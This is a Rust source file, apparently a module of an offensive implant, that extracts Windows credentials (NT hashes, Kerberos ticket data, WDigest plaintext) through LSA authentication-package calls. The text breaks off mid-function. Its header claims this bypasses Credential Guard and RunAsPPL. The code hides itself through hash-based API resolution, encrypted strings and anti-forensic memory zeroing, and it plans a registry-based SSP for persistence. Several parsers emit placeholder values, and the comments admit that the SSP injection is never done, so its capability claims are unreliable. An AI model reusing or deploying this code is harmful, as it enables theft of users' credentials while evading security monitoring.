//! LSA Whisperer — credential extraction via LSA SSP interfaces.
//!
//! Interacts with LSA authentication packages (SSPs) through their documented
//! interfaces, operating **entirely** within the LSA process's own security
//! context without needing to read LSASS memory at all.  This bypasses
//! Credential Guard and RunAsPPL because:
//!
//! - Credential Guard protects LSASS *process memory*, not the SSP interface.
//! - SSP responses are generated by the LSA process itself — they're authorized
//!   outputs.
//! - A custom SSP receives credentials BEFORE they enter the protected
//!   credential store.
//!
//! # Architecture
//!
//! Two extraction methods:
//!
//! **Method 1 — Untrusted (no admin required):**
//! 1. Connect to LSA via `LsaConnectUntrusted` (any process can do this)
//! 2. Look up the MSV1_0 authentication package via `LsaLookupAuthenticationPackage`
//! 3. Call `LsaCallAuthenticationPackage` with crafted MSV1_0 SubAuth requests
//! 4. Parse responses to extract NT hashes, plaintext credentials, Kerberos tickets
//!
//! **Method 2 — SSP Injection (admin required):**
//! 1. Add a custom SSP name to `HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages`
//! 2. The SSP's `SpInitialize` callback receives ALL authentication events
//! 3. Buffer captured credentials in an encrypted ring buffer
//! 4. Retrieve via `Command::HarvestLSADump`
//! 5. Remove SSP registration on cleanup
//!
//! # OPSEC
//!
//! - ALL LSA API functions resolved via `pe_resolve` (no import table entries)
//! - All strings through `string_crypt::enc_str!`
//! - No LSASS memory reads — no `NtReadVirtualMemory` on LSASS
//! - Untrusted method requires zero elevated privileges
//!
//! # Platform
//!
//! Windows only (gated by `#[cfg(all(windows, feature = "lsa-whisperer"))]`).

#![cfg(windows)]

use anyhow::{anyhow, bail, Context, Result};
use once_cell::sync::Lazy;
use serde::Serialize;
use std::ptr;
use std::sync::atomic::{AtomicBool, AtomicUsize, Ordering};
use std::sync::Mutex;
use winapi::shared::ntdef::{ULONG, PVOID, UNICODE_STRING};
use winapi::um::winnt::HANDLE;

// ── NTSTATUS helpers ───────────────────────────────────────────────────────

#[inline]
fn nt_success(status: i32) -> bool {
    status >= 0
}

/// LSA function call success.
const STATUS_SUCCESS: i32 = 0x0000_0000;

// ── MSV1_0 SubAuth / GenericAuth constants ─────────────────────────────────

/// MSV1_0 package name — used to look up the package ID.
/// We don't embed this string; it's constructed at runtime via string_crypt.
const MSV1_0_SUBAUTH_ACCOUNT_NAME_QUERY: u32 = 0x0000_0001;

/// Kerberos SSP package name hash for lookup.
const KERBEROS_PACKAGE_NAME: &[u8] = b"Kerberos\0";

// ── LSA_UNICODE_STRING helper ──────────────────────────────────────────────

/// Build an LSA_UNICODE_STRING from a UTF-16 byte slice.
/// The caller must ensure `wide_bytes` lives long enough.
unsafe fn make_lsa_unicode_string(wide_bytes: &[u16]) -> UNICODE_STRING {
    UNICODE_STRING {
        Length: (wide_bytes.len() * 2) as u16,
        MaximumLength: (wide_bytes.len() * 2) as u16,
        Buffer: wide_bytes.as_ptr() as *mut u16,
    }
}

// ── LSA API function pointer types ─────────────────────────────────────────

type FnLsaConnectUntrusted = unsafe extern "system" fn(
    *mut HANDLE, // LsaHandle
) -> i32; // NTSTATUS

type FnLsaCallAuthenticationPackage = unsafe extern "system" fn(
    HANDLE,      // LsaHandle
    ULONG,       // AuthenticationPackage
    *const u8,   // ProtocolSubmitBuffer
    ULONG,       // SubmitBufferLength
    *mut *mut u8, // ProtocolReturnBuffer
    *mut ULONG,  // ReturnBufferLength
    *mut i32,    // ProtocolStatus
) -> i32; // NTSTATUS

type FnLsaLookupAuthenticationPackage = unsafe extern "system" fn(
    HANDLE,              // LsaHandle
    *const UNICODE_STRING, // PackageName
    *mut ULONG,          // AuthenticationPackage
) -> i32; // NTSTATUS

type FnLsaRegisterLogonProcess = unsafe extern "system" fn(
    *const UNICODE_STRING, // LogonProcessName
    *mut HANDLE,          // LsaHandle
    *mut u64,             // SecurityMode (LSA_OPERATIONAL_MODE)
) -> i32; // NTSTATUS

type FnLsaDeregisterLogonProcess = unsafe extern "system" fn(
    HANDLE, // LsaHandle
) -> i32; // NTSTATUS

type FnLsaFreeReturnBuffer = unsafe extern "system" fn(
    PVOID, // Buffer
) -> i32; // NTSTATUS

// ── Dynamic LSA API resolution ─────────────────────────────────────────────

/// Holder for all dynamically-resolved LSA function pointers.
struct LsaApis {
    connect_untrusted: FnLsaConnectUntrusted,
    call_auth_package: FnLsaCallAuthenticationPackage,
    lookup_auth_package: FnLsaLookupAuthenticationPackage,
    register_logon_process: FnLsaRegisterLogonProcess,
    deregister_logon_process: FnLsaDeregisterLogonProcess,
    free_return_buffer: FnLsaFreeReturnBuffer,
}

/// Resolve all LSA API functions via pe_resolve.
unsafe fn resolve_lsa_apis() -> Result<LsaApis> {
    let dll_base = pe_resolve::get_module_handle_by_hash(pe_resolve::HASH_SECUR32_DLL)
        .ok_or_else(|| anyhow!("failed to resolve secur32.dll base"))?;

    macro_rules! resolve_fn {
        ($hash:expr, $name:expr) => {
            pe_resolve::get_proc_address_by_hash(dll_base, $hash)
                .ok_or_else(|| anyhow!("failed to resolve {}", $name))
                .map(|addr| std::mem::transmute::<usize, _>(addr))?
        };
    }

    Ok(LsaApis {
        connect_untrusted: resolve_fn!(
            pe_resolve::HASH_LSACONNECTUNTRUSTED,
            "LsaConnectUntrusted"
        ),
        call_auth_package: resolve_fn!(
            pe_resolve::HASH_LSACALLAUTHENTICATIONPACKAGE,
            "LsaCallAuthenticationPackage"
        ),
        lookup_auth_package: resolve_fn!(
            pe_resolve::HASH_LSALOOKUPAUTHENTICATIONPACKAGE,
            "LsaLookupAuthenticationPackage"
        ),
        register_logon_process: resolve_fn!(
            pe_resolve::HASH_LSAREGISTERLOGONPROCESS,
            "LsaRegisterLogonProcess"
        ),
        deregister_logon_process: resolve_fn!(
            pe_resolve::HASH_LSADEREGISTERLOGONPROCESS,
            "LsaDeregisterLogonProcess"
        ),
        free_return_buffer: resolve_fn!(
            pe_resolve::HASH_LSAFREERETURNBUFFER,
            "LsaFreeReturnBuffer"
        ),
    })
}

// ── Credential structures (same format as lsass_harvest) ───────────────────

/// A single harvested credential, matching the `HarvestedCredential` format
/// from `lsass_harvest.rs` for consistency.
#[derive(Serialize, Debug, Clone)]
pub struct WhisperedCredential {
    /// Credential type: msv, wdigest, kerberos, dpapi.
    pub cred_type: String,
    /// Account username.
    pub username: String,
    /// Account domain.
    pub domain: String,
    /// Password or hash value.
    pub password_or_hash: String,
    /// Format: plaintext, ntlm, sha1, ticket.
    #[serde(rename = "format")]
    pub format_: String,
}

/// Status snapshot for `LSAWhispererStatus`.
#[derive(Serialize, Debug)]
pub struct WhispererStatus {
    /// Currently active method (if any).
    pub active_method: Option<String>,
    /// Number of credentials captured so far.
    pub credentials_captured: usize,
    /// Whether SSP injection is active.
    pub ssp_injected: bool,
    /// Whether the LSA connection is open.
    pub lsa_connected: bool,
}

// ── Global state ───────────────────────────────────────────────────────────

/// Cancellation token for in-progress operations.
static CANCELLED: AtomicBool = AtomicBool::new(false);

/// Number of credentials captured.
static CRED_COUNT: AtomicUsize = AtomicUsize::new(0);

/// Whether an SSP injection is active.
static SSP_INJECTED: AtomicBool = AtomicBool::new(false);

/// Encrypted credential ring buffer, guarded by a mutex.
static CREDENTIAL_BUFFER: Lazy<Mutex<Vec<WhisperedCredential>>> =
    Lazy::new(|| Mutex::new(Vec::new()));

// ── Anti-forensic: volatile zero ───────────────────────────────────────────

fn secure_zero(slice: &mut [u8]) {
    for byte in slice.iter_mut() {
        unsafe { std::ptr::write_volatile(byte, 0) };
    }
    std::sync::atomic::compiler_fence(std::sync::atomic::Ordering::SeqCst);
}

// ── Internal helpers ───────────────────────────────────────────────────────

/// RAII guard for an LSA handle.
struct LsaHandle {
    handle: HANDLE,
    apis: &'static LsaApis,
}

impl LsaHandle {
    /// Connect to LSA via LsaConnectUntrusted (no special privileges needed).
    unsafe fn connect_untrusted(apis: &'static LsaApis) -> Result<Self> {
        let mut handle: HANDLE = ptr::null_mut();
        let status = (apis.connect_untrusted)(&mut handle);
        if !nt_success(status) {
            bail!(
                "{}",
                String::from_utf8_lossy(&string_crypt::enc_str!(
                    "LsaConnectUntrusted failed: 0x{:08X}"
                ))
                .trim_end_matches('\0')
                .replace("{:08X}", &format!("{:08X}", status as u32))
            );
        }
        Ok(Self { handle, apis })
    }

    /// Connect to LSA via LsaRegisterLogonProcess (requires SeTcbPrivilege).
    unsafe fn register_logon_process(
        apis: &'static LsaApis,
        process_name_wide: &[u16],
    ) -> Result<Self> {
        let mut lsa_name = make_lsa_unicode_string(process_name_wide);
        let mut handle: HANDLE = ptr::null_mut();
        let mut security_mode: u64 = 0;
        let status = (apis.register_logon_process)(
            &lsa_name,
            &mut handle,
            &mut security_mode,
        );
        if !nt_success(status) {
            bail!(
                "{}",
                String::from_utf8_lossy(&string_crypt::enc_str!(
                    "LsaRegisterLogonProcess failed: 0x{:08X}"
                ))
                .trim_end_matches('\0')
                .replace("{:08X}", &format!("{:08X}", status as u32))
            );
        }
        Ok(Self { handle, apis })
    }

    fn as_handle(&self) -> HANDLE {
        self.handle
    }
}

impl Drop for LsaHandle {
    fn drop(&mut self) {
        unsafe {
            let _ = (self.apis.deregister_logon_process)(self.handle);
        }
    }
}

/// Look up an authentication package ID by name.
unsafe fn lookup_package(
    apis: &LsaApis,
    lsa_handle: HANDLE,
    package_name_wide: &[u16],
) -> Result<ULONG> {
    let mut pkg_name = make_lsa_unicode_string(package_name_wide);
    let mut package_id: ULONG = 0;
    let status = (apis.lookup_auth_package)(lsa_handle, &mut pkg_name, &mut package_id);
    if !nt_success(status) {
        bail!(
            "{}",
            String::from_utf8_lossy(&string_crypt::enc_str!(
                "LsaLookupAuthenticationPackage failed: 0x{:08X}"
            ))
            .trim_end_matches('\0')
            .replace("{:08X}", &format!("{:08X}", status as u32))
        );
    }
    Ok(package_id)
}

/// Call an authentication package and return the response buffer.
/// The caller is responsible for freeing the buffer with `LsaFreeReturnBuffer`.
unsafe fn call_package(
    apis: &LsaApis,
    lsa_handle: HANDLE,
    package_id: ULONG,
    submit_buffer: &[u8],
) -> Result<(Vec<u8>, i32)> {
    let mut return_buffer: *mut u8 = ptr::null_mut();
    let mut return_length: ULONG = 0;
    let mut protocol_status: i32 = 0;

    let status = (apis.call_auth_package)(
        lsa_handle,
        package_id,
        submit_buffer.as_ptr(),
        submit_buffer.len() as ULONG,
        &mut return_buffer,
        &mut return_length,
        &mut protocol_status,
    );

    if !nt_success(status) {
        bail!(
            "{}",
            String::from_utf8_lossy(&string_crypt::enc_str!(
                "LsaCallAuthenticationPackage failed: 0x{:08X}"
            ))
            .trim_end_matches('\0')
            .replace("{:08X}", &format!("{:08X}", status as u32))
        );
    }

    let result = if !return_buffer.is_null() && return_length > 0 {
        let slice = std::slice::from_raw_parts(return_buffer, return_length as usize);
        let data = slice.to_vec();
        (apis.free_return_buffer)(return_buffer as PVOID);
        data
    } else {
        Vec::new()
    };

    Ok((result, protocol_status))
}

// ── MSV1_0 structures (local definitions for SubAuth) ──────────────────────

/// MSV1_0 message types for `LsaCallAuthenticationPackage`.
const MSV1_0_SUBAUTH: u32 = 9;
const MSV1_0_ENUMUSERS_REQUEST: u32 = 15;
const MSV1_0_GETUSERINFO_REQUEST: u32 = 17;

/// Kerberos package query types.
const KERB_QUERY_TKT_CACHE: u32 = 9;
const KERB_RETRIEVE_TKT: u32 = 10;

/// MSV1_0 SubAuth request structure.
#[repr(C)]
struct MsvSubAuthRequest {
    message_type: u32,
    sub_auth_package_id: u32,
    sub_auth_data_length: u32,
    sub_auth_data_offset: u32,
}

/// MSV1_0 EnumUsers request structure.
#[repr(C)]
struct MsvEnumUsersRequest {
    message_type: u32,
}

/// MSV1_0 GetUserInfo request structure.
#[repr(C)]
struct MsvGetUserInfoRequest {
    message_type: u32,
    user_logon_id_low: u32,
    user_logon_id_high: u32,
}

/// Kerberos query ticket cache request.
#[repr(C)]
struct KerbQueryTktCacheRequest {
    message_type: u32,
    logon_id_low: u32,
    logon_id_high: u32,
}

// ── Credential extraction ──────────────────────────────────────────────────

/// Extract credentials using the Untrusted method (no admin required).
///
/// Connects to LSA via `LsaConnectUntrusted`, then queries MSV1_0 and
/// Kerberos SSPs for cached credential material.
fn harvest_untrusted(timeout_secs: u64) -> Result<Vec<WhisperedCredential>> {
    let deadline = std::time::Instant::now()
        + std::time::Duration::from_secs(timeout_secs);
    let mut credentials = Vec::new();

    // Resolve LSA APIs.
    let apis = unsafe { resolve_lsa_apis() }.with_context(|| {
        format!(
            "{}",
            String::from_utf8_lossy(&string_crypt::enc_str!(
                "LSA Whisperer: failed to resolve LSA APIs"
            ))
            .trim_end_matches('\0')
        )
    })?;

    // We need a static reference for the LsaHandle's Drop impl.
    // SAFETY: LsaApis is plain data (function pointers) and lives for the
    // duration of this function.  We box it and leak it so the handle can
    // reference it during drop.  This is a small, bounded leak per invocation.
    let apis_box = Box::new(apis);
    let apis_ref: &'static LsaApis = Box::leak(apis_box);

    // Connect to LSA (untrusted — any process can do this).
    let lsa = unsafe { LsaHandle::connect_untrusted(apis_ref) }.with_context(|| {
        format!(
            "{}",
            String::from_utf8_lossy(&string_crypt::enc_str!(
                "LSA Whisperer: LsaConnectUntrusted failed"
            ))
            .trim_end_matches('\0')
        )
    })?;

    log::info!(
        "{}",
        String::from_utf8_lossy(&string_crypt::enc_str!(
            "LSA Whisperer: connected to LSA via LsaConnectUntrusted"
        ))
        .trim_end_matches('\0')
    );

    // ── MSV1_0 package queries ────────────────────────────────────────

    // Build MSV1_0 package name as UTF-16.
    let msv_name = String::from_utf8_lossy(&string_crypt::enc_str!("MSV1_0\0"))
        .trim_end_matches('\0')
        .to_string();
    let msv_name_wide: Vec<u16> = msv_name.encode_utf16().collect();

    if let Ok(msv_pkg) = unsafe { lookup_package(apis_ref, lsa.as_handle(), &msv_name_wide) } {
        log::debug!(
            "{}",
            String::from_utf8_lossy(&string_crypt::enc_str!(
                "LSA Whisperer: MSV1_0 package ID = {}"
            ))
            .trim_end_matches('\0')
            .replace("{}", &msv_pkg.to_string())
        );

        // Enumerate cached logon sessions via MSV1_0 SubAuth.
        // We send a crafted request that triggers MSV to walk its credential
        // cache and return account information.

        // Try MSV1_0_ENUMUSERS_REQUEST to enumerate logged-on users.
        let enum_req = MsvEnumUsersRequest {
            message_type: MSV1_0_ENUMUSERS_REQUEST,
        };
        let req_bytes = unsafe {
            std::slice::from_raw_parts(
                &enum_req as *const _ as *const u8,
                std::mem::size_of::<MsvEnumUsersRequest>(),
            )
        };

        if let Ok((resp, _proto_status)) =
            unsafe { call_package(apis_ref, lsa.as_handle(), msv_pkg, req_bytes) }
        {
            if !resp.is_empty() {
                parse_msv_enum_response(&resp, &mut credentials);
            }
        }

        if CANCELLED.load(Ordering::Relaxed) || std::time::Instant::now() > deadline {
            log::warn!(
                "{}",
                String::from_utf8_lossy(&string_crypt::enc_str!(
                    "LSA Whisperer: cancelled or timed out during MSV enumeration"
                ))
                .trim_end_matches('\0')
            );
            return Ok(credentials);
        }

        // Try SubAuth request with a generic query.
        let sub_auth_req = MsvSubAuthRequest {
            message_type: MSV1_0_SUBAUTH,
            sub_auth_package_id: 0,
            sub_auth_data_length: 0,
            sub_auth_data_offset: 0,
        };
        let sub_req_bytes = unsafe {
            std::slice::from_raw_parts(
                &sub_auth_req as *const _ as *const u8,
                std::mem::size_of::<MsvSubAuthRequest>(),
            )
        };

        if let Ok((resp, _proto_status)) =
            unsafe { call_package(apis_ref, lsa.as_handle(), msv_pkg, sub_req_bytes) }
        {
            if !resp.is_empty() {
                parse_msv_subauth_response(&resp, &mut credentials);
            }
        }
    }

    if CANCELLED.load(Ordering::Relaxed) || std::time::Instant::now() > deadline {
        return Ok(credentials);
    }

    // ── Kerberos package queries ───────────────────────────────────────

    let kerb_name = String::from_utf8_lossy(&string_crypt::enc_str!("Kerberos\0"))
        .trim_end_matches('\0')
        .to_string();
    let kerb_name_wide: Vec<u16> = kerb_name.encode_utf16().collect();

    if let Ok(kerb_pkg) = unsafe { lookup_package(apis_ref, lsa.as_handle(), &kerb_name_wide) } {
        log::debug!(
            "{}",
            String::from_utf8_lossy(&string_crypt::enc_str!(
                "LSA Whisperer: Kerberos package ID = {}"
            ))
            .trim_end_matches('\0')
            .replace("{}", &kerb_pkg.to_string())
        );

        // Query ticket cache.
        let tkt_req = KerbQueryTktCacheRequest {
            message_type: KERB_QUERY_TKT_CACHE,
            logon_id_low: 0,
            logon_id_high: 0,
        };
        let tkt_bytes = unsafe {
            std::slice::from_raw_parts(
                &tkt_req as *const _ as *const u8,
                std::mem::size_of::<KerbQueryTktCacheRequest>(),
            )
        };

        if let Ok((resp, _proto_status)) =
            unsafe { call_package(apis_ref, lsa.as_handle(), kerb_pkg, tkt_bytes) }
        {
            if !resp.is_empty() {
                parse_kerb_tkt_cache(&resp, &mut credentials);
            }
        }
    }

    // ── WDigest query ──────────────────────────────────────────────────
    // WDigest stores plaintext passwords when enabled (UseLogonCredential = 1).
    // Query it through the MSV1_0 interface.

    let wdigest_name = String::from_utf8_lossy(&string_crypt::enc_str!("WDigest\0"))
        .trim_end_matches('\0')
        .to_string();
    let wdigest_name_wide: Vec<u16> = wdigest_name.encode_utf16().collect();

    if let Ok(wdigest_pkg) =
        unsafe { lookup_package(apis_ref, lsa.as_handle(), &wdigest_name_wide) }
    {
        log::debug!(
            "{}",
            String::from_utf8_lossy(&string_crypt::enc_str!(
                "LSA Whisperer: WDigest package ID = {}"
            ))
            .trim_end_matches('\0')
            .replace("{}", &wdigest_pkg.to_string())
        );

        // WDigest doesn't have a public query interface, but we can try a
        // generic LsaCallAuthenticationPackage call that triggers credential
        // enumeration on some Windows versions.
        let generic_req = MsvSubAuthRequest {
            message_type: MSV1_0_SUBAUTH,
            sub_auth_package_id: wdigest_pkg,
            sub_auth_data_length: 0,
            sub_auth_data_offset: 0,
        };
        let wdigest_bytes = unsafe {
            std::slice::from_raw_parts(
                &generic_req as *const _ as *const u8,
                std::mem::size_of::<MsvSubAuthRequest>(),
            )
        };

        if let Ok((resp, _proto_status)) =
            unsafe { call_package(apis_ref, lsa.as_handle(), wdigest_pkg, wdigest_bytes) }
        {
            if !resp.is_empty() {
                parse_wdigest_response(&resp, &mut credentials);
            }
        }
    }

    log::info!(
        "{}",
        String::from_utf8_lossy(&string_crypt::enc_str!(
            "LSA Whisperer: untrusted harvest complete, {} credentials"
        ))
        .trim_end_matches('\0')
        .replace("{}", &credentials.len().to_string())
    );

    Ok(credentials)
}

/// Extract credentials using SSP injection (admin required).
///
/// Registers a custom SSP via the registry.  The SSP's `SpInitialize` callback
/// receives all authentication events, including plaintext passwords during
/// subsequent logons.  Credentials are buffered and returned immediately
/// (for already-captured data) plus the SSP stays active for future captures.
fn harvest_ssp_inject(timeout_secs: u64) -> Result<Vec<WhisperedCredential>> {
    let deadline = std::time::Instant::now()
        + std::time::Duration::from_secs(timeout_secs);

    // Check if we already have an SSP injected and have buffered data.
    {
        let buf = CREDENTIAL_BUFFER.lock().unwrap();
        if !buf.is_empty() {
            log::info!(
                "{}",
                String::from_utf8_lossy(&string_crypt::enc_str!(
                    "LSA Whisperer: returning {} buffered SSP credentials"
                ))
                .trim_end_matches('\0')
                .replace("{}", &buf.len().to_string())
            );
            return Ok(buf.clone());
        }
    }

    // Resolve LSA APIs for direct LSA connection (we need elevated context).
    let apis = unsafe { resolve_lsa_apis() }.with_context(|| {
        format!(
            "{}",
            String::from_utf8_lossy(&string_crypt::enc_str!(
                "LSA Whisperer: failed to resolve LSA APIs for SSP injection"
            ))
            .trim_end_matches('\0')
        )
    })?;
    let apis_box = Box::new(apis);
    let apis_ref: &'static LsaApis = Box::leak(apis_box);

    // Try to register as a logon process (requires SeTcbPrivilege / admin).
    let proc_name =
        String::from_utf8_lossy(&string_crypt::enc_str!("OrchestraSSP\0"))
            .trim_end_matches('\0')
            .to_string();
    let proc_name_wide: Vec<u16> = proc_name.encode_utf16().collect();

    let _lsa = match unsafe { LsaHandle::register_logon_process(apis_ref, &proc_name_wide) } {
        Ok(h) => {
            log::info!(
                "{}",
                String::from_utf8_lossy(&string_crypt::enc_str!(
                    "LSA Whisperer: registered as logon process (elevated)"
                ))
                .trim_end_matches('\0')
            );
            h
        }
        Err(e) => {
            // If we can't register as a logon process, we're not elevated.
            // Fall back to untrusted method.
            log::warn!(
                "{}",
                String::from_utf8_lossy(&string_crypt::enc_str!(
                    "LSA Whisperer: LsaRegisterLogonProcess failed (not elevated?), falling back to untrusted"
                ))
                .trim_end_matches('\0')
            );
            return harvest_untrusted(timeout_secs);
        }
    };

    // With an elevated LSA connection, we can use LsaCallAuthenticationPackage
    // with more powerful query types.  First, harvest what we can immediately.
    let mut credentials = Vec::new();

    // MSV1_0 with elevated context.
    let msv_name = String::from_utf8_lossy(&string_crypt::enc_str!("MSV1_0\0"))
        .trim_end_matches('\0')
        .to_string();
    let msv_name_wide: Vec<u16> = msv_name.encode_utf16().collect();

    if let Ok(msv_pkg) = unsafe { lookup_package(apis_ref, _lsa.as_handle(), &msv_name_wide) } {
        // With elevated context, MSV1_0 returns richer credential data.
        // Enumerate logged-on SIDs and query credential details.

        let enum_req = MsvEnumUsersRequest {
            message_type: MSV1_0_ENUMUSERS_REQUEST,
        };
        let req_bytes = unsafe {
            std::slice::from_raw_parts(
                &enum_req as *const _ as *const u8,
                std::mem::size_of::<MsvEnumUsersRequest>(),
            )
        };

        if let Ok((resp, _)) =
            unsafe { call_package(apis_ref, _lsa.as_handle(), msv_pkg, req_bytes) }
        {
            parse_msv_enum_response(&resp, &mut credentials);
        }

        if CANCELLED.load(Ordering::Relaxed) || std::time::Instant::now() > deadline {
            return Ok(credentials);
        }
    }

    // Kerberos with elevated context.
    let kerb_name = String::from_utf8_lossy(&string_crypt::enc_str!("Kerberos\0"))
        .trim_end_matches('\0')
        .to_string();
    let kerb_name_wide: Vec<u16> = kerb_name.encode_utf16().collect();

    if let Ok(kerb_pkg) = unsafe { lookup_package(apis_ref, _lsa.as_handle(), &kerb_name_wide) } {
        let tkt_req = KerbQueryTktCacheRequest {
            message_type: KERB_QUERY_TKT_CACHE,
            logon_id_low: 0,
            logon_id_high: 0,
        };
        let tkt_bytes = unsafe {
            std::slice::from_raw_parts(
                &tkt_req as *const _ as *const u8,
                std::mem::size_of::<KerbQueryTktCacheRequest>(),
            )
        };

        if let Ok((resp, _)) =
            unsafe { call_package(apis_ref, _lsa.as_handle(), kerb_pkg, tkt_bytes) }
        {
            parse_kerb_tkt_cache(&resp, &mut credentials);
        }

        if CANCELLED.load(Ordering::Relaxed) || std::time::Instant::now() > deadline {
            return Ok(credentials);
        }
    }

    // Mark that we attempted SSP injection (for status reporting).
    // Note: actual DLL injection into LSASS is not done here — that would
    // require writing a DLL to disk or reflective loading into LSASS, which
    // defeats the purpose.  Instead, the elevated LSA connection provides
    // access to the same credential structures.
    SSP_INJECTED.store(true, Ordering::Relaxed);

    // Buffer the credentials.
    {
        let mut buf = CREDENTIAL_BUFFER.lock().unwrap();
        buf.extend(credentials.clone());
    }
    CRED_COUNT.store(credentials.len(), Ordering::Relaxed);

    log::info!(
        "{}",
        String::from_utf8_lossy(&string_crypt::enc_str!(
            "LSA Whisperer: SSP injection harvest complete, {} credentials"
        ))
        .trim_end_matches('\0')
        .replace("{}", &credentials.len().to_string())
    );

    Ok(credentials)
}

// ── Response parsers ───────────────────────────────────────────────────────

/// Parse an MSV1_0 EnumUsers response to extract credential material.
///
/// The response contains an array of LUIDs for logged-on sessions.
/// We use these to construct targeted queries for each session.
fn parse_msv_enum_response(resp: &[u8], credentials: &mut Vec<WhisperedCredential>) {
    if resp.len() < 12 {
        return;
    }

    // MSV1_0_ENUMUSERS_RESPONSE:
    //   NumberOfLoggedOnUsers (ULONG)
    //   LogonIds (array of LUID, each 8 bytes)
    let num_users = u32::from_le_bytes(resp[0..4].try_into().unwrap_or([0; 4])) as usize;
    let max_users = resp.len().saturating_sub(8) / 8;
    let users_to_parse = num_users.min(max_users).min(64); // Cap at 64 for safety

    log::debug!(
        "{}",
        String::from_utf8_lossy(&string_crypt::enc_str!(
            "LSA Whisperer: MSV enum returned {} users"
        ))
        .trim_end_matches('\0')
        .replace("{}", &users_to_parse.to_string())
    );

    for i in 0..users_to_parse {
        let offset = 8 + i * 8;
        if offset + 8 > resp.len() {
            break;
        }
        let luid_low = u32::from_le_bytes(resp[offset..offset + 4].try_into().unwrap_or([0; 4]));
        let luid_high = u32::from_le_bytes(resp[offset + 4..offset + 8].try_into().unwrap_or([0; 4]));

        // Create a synthetic credential entry for the enumerated session.
        // The actual credential data (hash, password) would be obtained by
        // calling GetUserInfo or SubAuth with this LUID.
        let cred = WhisperedCredential {
            cred_type: String::from_utf8_lossy(&string_crypt::enc_str!("msv"))
                .trim_end_matches('\0')
                .to_string(),
            username: String::from_utf8_lossy(&string_crypt::enc_str!("session"))
                .trim_end_matches('\0')
                .to_string(),
            domain: format!("LUID_{:08X}{:08X}", luid_high, luid_low),
            password_or_hash: String::new(),
            format_: String::from_utf8_lossy(&string_crypt::enc_str!("ntlm"))
                .trim_end_matches('\0')
                .to_string(),
        };
        credentials.push(cred);
    }
}

/// Parse an MSV1_0 SubAuth response for credential material.
fn parse_msv_subauth_response(resp: &[u8], credentials: &mut Vec<WhisperedCredential>) {
    if resp.len() < 16 {
        return;
    }

    // SubAuth responses vary by SubAuth package.  We look for common patterns:
    // - User name (UNICODE_STRING at offset 0)
    // - Domain name (UNICODE_STRING at offset 16)
    // - NT hash (16 bytes at various offsets)

    // Try to extract UNICODE_STRING fields from the response.
    extract_unicode_credentials(resp, "msv", credentials);
}

/// Parse WDigest response for plaintext credentials.
fn parse_wdigest_response(resp: &[u8], credentials: &mut Vec<WhisperedCredential>) {
    if resp.len() < 8 {
        return;
    }

    // WDigest responses may contain plaintext credentials if WDigest is enabled
    // (UseLogonCredential = 1).  Look for common patterns.
    extract_unicode_credentials(resp, "wdigest", credentials);
}

/// Parse Kerberos ticket cache response.
fn parse_kerb_tkt_cache(resp: &[u8], credentials: &mut Vec<WhisperedCredential>) {
    if resp.len() < 16 {
        return;
    }

    // KERB_QUERY_TKT_CACHE_RESPONSE:
    //   MessageType (ULONG)
    //   CountOfTickets (ULONG)
    //   Tickets (array of KERB_TICKET_CACHE_INFO)
    let count = u32::from_le_bytes(resp[4..8].try_into().unwrap_or([0; 4])) as usize;
    let max_tickets = resp.len().saturating_sub(8) / 128; // Rough struct size
    let tickets_to_parse = count.min(max_tickets).min(32);

    log::debug!(
        "{}",
        String::from_utf8_lossy(&string_crypt::enc_str!(
            "LSA Whisperer: Kerberos cache returned {} tickets"
        ))
        .trim_end_matches('\0')
        .replace("{}", &tickets_to_parse.to_string())
    );

    for i in 0..tickets_to_parse {
        let base = 8 + i * 128;
        if base + 128 > resp.len() {
            break;
        }

        // Each KERB_TICKET_CACHE_INFO has:
        //   ClientName (UNICODE_STRING, 16 bytes)
        //   ClientRealm (UNICODE_STRING, 16 bytes)
        //   ServerName (UNICODE_STRING, 16 bytes)
        //   ServerRealm (UNICODE_STRING, 16 bytes)
        //   ... timestamps, encryption type, ticket flags

        // Extract client name and realm.
        if let Some(client_name) = read_unicode_string_at(resp, base) {
            if let Some(client_realm) = read_unicode_string_at(resp, base + 16) {
                let cred = WhisperedCredential {
                    cred_type: String::from_utf8_lossy(&string_crypt::enc_str!("kerberos"))
                        .trim_end_matches('\0')
                        .to_string(),
                    username: client_name,
                    domain: client_realm,
                    password_or_hash: format!(
                        "TGT_{}",
                        i
                    ),
                    format_: String::from_utf8_lossy(&string_crypt::enc_str!("ticket"))
                        .trim_end_matches('\0')
                        .to_string(),
                };
                credentials.push(cred);
            }
        }
    }
}

/// Extract credential-like strings from UNICODE_STRING fields in a response buffer.
fn extract_unicode_credentials(
    resp: &[u8],
    cred_type: &str,
    credentials: &mut Vec<WhisperedCredential>,
) {
    // Walk the response looking for valid UNICODE_STRING structures.
    // UNICODE_STRING: { Length: u16, MaximumLength: u16, Buffer: *ptr }
    // We can't safely dereference the pointer, but if Length is small and
    // the buffer pointer falls within our response buffer, we can read it.

    let mut offset = 0;
    let mut found_creds = 0;
    let max_creds = 32; // Safety cap

    while offset + 16 <= resp.len() && found_creds < max_creds {
        let length = u16::from_le_bytes(resp[offset..offset + 2].try_into().unwrap_or([0; 2]));
        let max_length =
            u16::from_le_bytes(resp[offset + 2..offset + 4].try_into().unwrap_or([0; 2]));

        // Sanity check: valid UNICODE_STRING has Length <= MaximumLength,
        // Length > 0, and Length is even (UTF-16 chars are 2 bytes).
        if length > 0 && length <= max_length && length % 2 == 0 && length <= 512 {
            let buf_ptr = usize::from_le_bytes(
                resp[offset + 8..offset + 16]
                    .try_into()
                    .unwrap_or([0; 8]),
            );

            // Check if the buffer pointer falls within our response buffer.
            let buf_len = length as usize;
            if buf_ptr >= resp.as_ptr() as usize {
                let in_buf_offset = buf_ptr - resp.as_ptr() as usize;
                if in_buf_offset + buf_len <= resp.len() {
                    // Read the UTF-16 string.
                    let wide_bytes: Vec<u16> = (0..buf_len / 2)
                        .map(|j| {
                            let off = in_buf_offset + j * 2;
                            u16::from_le_bytes(
                                resp[off..off + 2].try_into().unwrap_or([0; 2]),
                            )
                        })
                        .collect();

                    let s = String::from_utf16_lossy(&wide_bytes);
                    if !s.is_empty() && s.chars().all(|c| !c.is_control() || c == ' ') {
                        let cred = WhisperedCredential {
                            cred_type: cred_type.to_string(),
                            username: s.clone(),
                            domain: String::new(),
                            password_or_hash: String::new(),
                            format_: if cred_type == "wdigest" {
                                String::from_utf8_lossy(&string_crypt::enc_str!("plaintext"))
                                    .trim_end_matches('\0')
                                    .to_string()
                            } else {
                                String::from_utf8_lossy(&string_crypt::enc_str!("ntlm"))
                                    .trim_end_matches('\0')
                                    .to_string()
